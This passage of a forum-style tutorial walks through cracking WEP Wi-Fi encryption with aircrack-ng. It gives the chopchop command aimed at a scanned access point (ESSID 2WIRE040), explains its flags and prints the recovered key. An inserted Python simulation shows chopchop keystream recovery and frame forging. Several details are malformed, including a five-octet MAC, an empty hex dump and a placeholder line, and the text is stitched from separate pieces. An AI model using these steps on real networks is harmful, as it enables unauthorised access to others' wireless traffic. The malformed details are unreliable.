Interface       Chipset         Driver

wlan0           RTL8187         rtl8187 - [phy0]
                                (monitor mode enabled on mon1)
mon0            RTL8187         rtl8187 - [phy0]
If you see "(monitor mode enabled on ...)" in that output, the card is in monitor mode and you are good to go. Use whichever monX interface airmon-ng reports; the commands below use mon0.
00:48:01

BSSID              PWR  Beacons
00:24:A5:AD:79:59  -13       26
00:1C:10:A1:C1:32  -61        3
00:1B:5B:B3:B5:71  -63        4
00:18:39:B1:4D:DD  -64       14
00:19:E4:48:97:A9  -63       11
00:18:39:62:34:EE  -63       19
00:25:3C:F1:C9:E9  -66        5
00:1A:70:00:77:E4  -64       13
00:18:3F:2B:A2:01  -67        7
00:26:50:D0:4D:C9  -69        2
00:0F:66:D2:6E:F4  -70        5
00:1D:7E:97:C0:1D  -71        4
00:1E:E5:EB:63:6C  -69        5
00:23:51:3B:89:D1  -71        3
00:24:B2:51:C6:CA  -71        3
Now you can build an encrypted packet with packetforge-ng out of the 1500-byte keystream (the .xor file aireplay-ng wrote in the previous step).
Did the previous step fail? If so, try the chopchop attack shown below; it recovers the keystream one byte at a time instead.
aireplay-ng -4 -h 36:b1:e6:05:32 -b 00:19:E4:48:97:A9 mon0
-4 selects the chopchop attack
-h is our host (client) MAC address, in this case 36:b1:e6:05:32; it must be a MAC the AP will accept frames from, i.e. one that is associated, or a fake authentication (aireplay-ng -1) must be done first
-b is the WAP (BSSID) MAC address, in this case 00:19:E4:48:97:A9
mon0 is the monitor-mode wireless interface
You should see something similar to this:

01:54:33  Waiting for beacon frame (BSSID: 00:19:E4:48:97:A9) on channel 1

        Size: 68, FromDS: 1, ToDS: 0 (WEP)

              BSSID  =  00:19:E4:48:97:A9
          Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  00:19:E4:48:97:A9

        0x0000:
        0x0010:
        0x0020:
        0x0030:
        0x0040:

Offset   [one progress line per recovered keystream byte, counting down from the last byte of the packet]
BSSID              PWR  Beacons  #Data  ESSID
00:19:E4:48:97:A9  -67       33   8396  2WIRE040
   KB    depth   byte(vote)
    0    0/  2   82(57088) CE(52224) 09(51968) F1(51712) 8A(51200) 3E(50944) 52(50432) 4E(50176) 4F(50176) 93(50176) 35(49920) EE(49920) 13(48896) 14(48896)
    1    1/  3   90(52736) F9(52224) 2E(51200) D5(50944) BA(50688) B9(50432) 51(49920) C1(49920) 48(49664) 35(49408) 12(49152) 9B(49152) F4(48896) 9D(48640)
    2    0/  1   73(60416) 49(54016) 79(52480) 11(52224) 22(52224) 7B(51712) EF(50944) 16(50432) 58(50432) 82(50432) D4(50432) 72(49664) 3A(49408) BA(49152)
    3    0/  6   08(56320) A8(54784) 1C(52992) B3(52736) 10(52224) 8D(51968) D8(50944) 82(50688) 10(50176) 0E(49920) CB(49920) F7(49408) 5F(49152) DA(49152)
    4    0/  3   80(55808) 00(52480) 0B(51456) FC(50944) 95(50432) B7(50432) AE(49920) C0(49408) E4(49152) 24(48896) 6D(48896) 82(48896) 7F(48640) D4(48640)

                         KEY FOUND! [ 82:77:73:08:80 ]
        Decrypted correctly: 100%
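Added example, not part of this tutorial or of the aircrack-ng suite: a Python simulation of what the chopchop attack above and aircrack-ng's final "Decrypted correctly" check actually compute. WEP's ICV is a plain CRC-32, and CRC is linear, so chopping the last ciphertext byte and guessing its plaintext lets you fix up the ICV without knowing the key or the keystream; the AP then tells you whether the guess was right by accepting or dropping the frame. The key below is the one aircrack-ng printed on this page; the IV, the payload and the oracle (a closure standing in for the AP, which is the only place the key is used) are constructed for the example. The last step forges a fresh frame from the recovered keystream, which is what packetforge-ng does with the .xor file.

```python
import struct
import zlib

# Reflected CRC-32 table with the WEP ICV polynomial (same result as zlib.crc32).
CRC_TABLE = []
for _i in range(256):
    _c = _i
    for _ in range(8):
        _c = (_c >> 1) ^ 0xEDB88320 if _c & 1 else _c >> 1
    CRC_TABLE.append(_c)
# The top byte of every table entry is distinct, so it identifies the table index.
# Chopchop relies on this to undo one CRC step without knowing the rest of the register.
CRC_INV = {t >> 24: j for j, t in enumerate(CRC_TABLE)}
assert len(CRC_INV) == 256


def rc4(key, n):
    """RC4 keystream of n bytes; WEP seeds it with the 3-byte IV followed by the key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key, iv, plaintext):
    """Encrypted WEP body: RC4(IV||key) XOR (plaintext || little-endian CRC-32 ICV)."""
    body = plaintext + struct.pack("<I", zlib.crc32(plaintext))
    return xor(body, rc4(iv + key, len(body)))


def wep_icv_ok(key, iv, body):
    """The check an AP makes, and what aircrack-ng's 'Decrypted correctly' reports."""
    m = xor(body, rc4(iv + key, len(body)))
    return len(m) >= 4 and struct.unpack("<I", m[-4:])[0] == zlib.crc32(m[:-4])


def chop_correction(guess):
    """XOR mask for the last 4 bytes of a body whose final byte (plaintext `guess`) was chopped.

    One CRC step is R = (R' >> 8) ^ T[j]. The guessed plaintext byte is the top byte
    of ~R, which fixes j, and j fixes the difference between the old and new ICV.
    """
    j = CRC_INV[guess ^ 0xFF]
    t = CRC_TABLE[j]
    return bytes([j ^ 0xFF, t & 0xFF, (t >> 8) & 0xFF, (t >> 16) & 0xFF])


def chopchop(body, oracle):
    """Recover the whole keystream for `body` using only an ICV-validity oracle.

    `oracle(candidate)` answers True when the AP would accept the candidate body.
    Returns (keystream, number_of_oracle_queries).
    """
    ks = bytearray(len(body))
    cur = bytearray(body)
    queries = 0
    while len(cur) > 4:
        for guess in range(256):
            cand = cur[:-1]
            mask = chop_correction(guess)
            for k in range(4):
                cand[-4 + k] ^= mask[k]
            queries += 1
            if oracle(bytes(cand)):
                ks[len(cur) - 1] = cur[-1] ^ guess  # chopped ciphertext byte XOR its plaintext
                cur = cand
                break
        else:
            raise RuntimeError("no guess accepted; oracle is not a plain ICV check")
    # Only the ICV of the empty message is left; CRC-32 of b'' is 0, so the
    # remaining 4 ciphertext bytes are the first 4 keystream bytes themselves.
    ks[:4] = cur[:4]
    return bytes(ks), queries


# Constructed inputs: the key is the one aircrack-ng printed above; IV and payload are made up.
KEY = bytes.fromhex("8277730880")
IV = bytes.fromhex("035ac7")
PLAIN = bytes.fromhex("aaaa030000000806") + b"constructed-arp-body"


def demo():
    body = wep_encrypt(KEY, IV, PLAIN)
    # The attacker never sees KEY; the closure stands in for the AP relaying valid frames.
    ks, queries = chopchop(body, lambda cand: wep_icv_ok(KEY, IV, cand))
    recovered = xor(body, ks)[:-4]
    # Forge a new frame under the same IV from the recovered keystream (packetforge-ng's job).
    forged_plain = b"forged by the attacker"
    forged = xor(forged_plain + struct.pack("<I", zlib.crc32(forged_plain)), ks)
    return {
        "keystream_ok": ks == rc4(IV + KEY, len(body)),
        "recovered": recovered,
        "queries": queries,
        "forged_accepted": wep_icv_ok(KEY, IV, forged),
    }


if __name__ == "__main__":
    r = demo()
    print(r["recovered"], r["queries"], r["keystream_ok"], r["forged_accepted"])
```

Each byte costs at most 256 oracle queries, which is why aireplay-ng's per-offset progress lines take a while on a quiet network; the real AP only acts as this oracle for frames it is willing to relay, which is why -h has to be a MAC the AP accepts.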
I hope you enjoyed my tutorial.
Securityxxxpert
Note: I will also be making a video to attach to this when time permits.